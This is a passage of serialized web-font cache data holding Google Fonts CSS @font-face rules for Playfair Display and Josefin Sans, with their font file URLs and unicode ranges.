url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnohkk72xU.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojUk72xU.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnojEk72xU.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: italic;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFkD-vYSZviVYUb_rj3ij__anPXDTnogkk7.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 700;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 800;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* cyrillic */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTjYgFE_.woff2) format(\'woff2\');unicode-range: U+0301, U+0400-045F, U+0490-0491, U+04B0-04B1, U+2116;}/* vietnamese */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTPYgFE_.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTLYgFE_.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Playfair Display\';font-style: normal;font-weight: 900;font-display: swap;src: url(https://fonts.gstatic.com/s/playfairdisplay/v40/nuFiD-vYSZviVYUb_rj3ij__anPXDTzYgA.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}\";}s:437:\"https://fonts.googleapis.com/css?family=Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic|Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic|Josefin+Sans:100,200,300,regular,500,600,700,100italic,200italic,300italic,italic,500italic,600italic,700italic&subset=latin,latin-ext&display=swap_modern_ua\";a:1:{s:12:\"google-fonts\";s:206532:\"/* Original: https://fonts.googleapis.com/css?family=Playfair+Display:regular,500,600,700,800,900,italic,500italic,600italic,700italic,800italic,900italic|Montserrat:100,200,300,regular,500,600,700,800,900,100italic,200italic,300italic,italic,500italic,600italic,700italic,800italic,900italic|Josefin+Sans:100,200,300,regular,500,600,700,100italic,200italic,300italic,italic,500italic,600italic,700italic&subset=latin,latin-ext&display=swap *//* User Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 16_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.0 Mobile/15E148 Safari/604.1 *//* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 100;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 200;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 300;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 400;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx0XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0100-02BA, U+02BD-02C5, U+02C7-02CC, U+02CE-02D7, U+02DD-02FF, U+0304, U+0308, U+0329, U+1D00-1DBF, U+1E00-1E9F, U+1EF2-1EFF, U+2020, U+20A0-20AB, U+20AD-20C0, U+2113, U+2C60-2C7F, U+A720-A7FF;}/* latin */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 500;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx6XHgOiJM6.woff2) format(\'woff2\');unicode-range: U+0000-00FF, U+0131, U+0152-0153, U+02BB-02BC, U+02C6, U+02DA, U+02DC, U+0304, U+0308, U+0329, U+2000-206F, U+20AC, U+2122, U+2191, U+2193, U+2212, U+2215, U+FEFF, U+FFFD;}/* vietnamese */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: url(https://fonts.gstatic.com/s/josefinsans/v34/Qw3EZQNVED7rKGKxtqIqX5EUCEx1XHgOiJM6xPE.woff2) format(\'woff2\');unicode-range: U+0102-0103, U+0110-0111, U+0128-0129, U+0168-0169, U+01A0-01A1, U+01AF-01B0, U+0300-0301, U+0303-0304, U+0308-0309, U+0323, U+0329, U+1EA0-1EF9, U+20AB;}/* latin-ext */@font-face {font-family: \'Josefin Sans\';font-style: italic;font-weight: 600;font-display: swap;src: 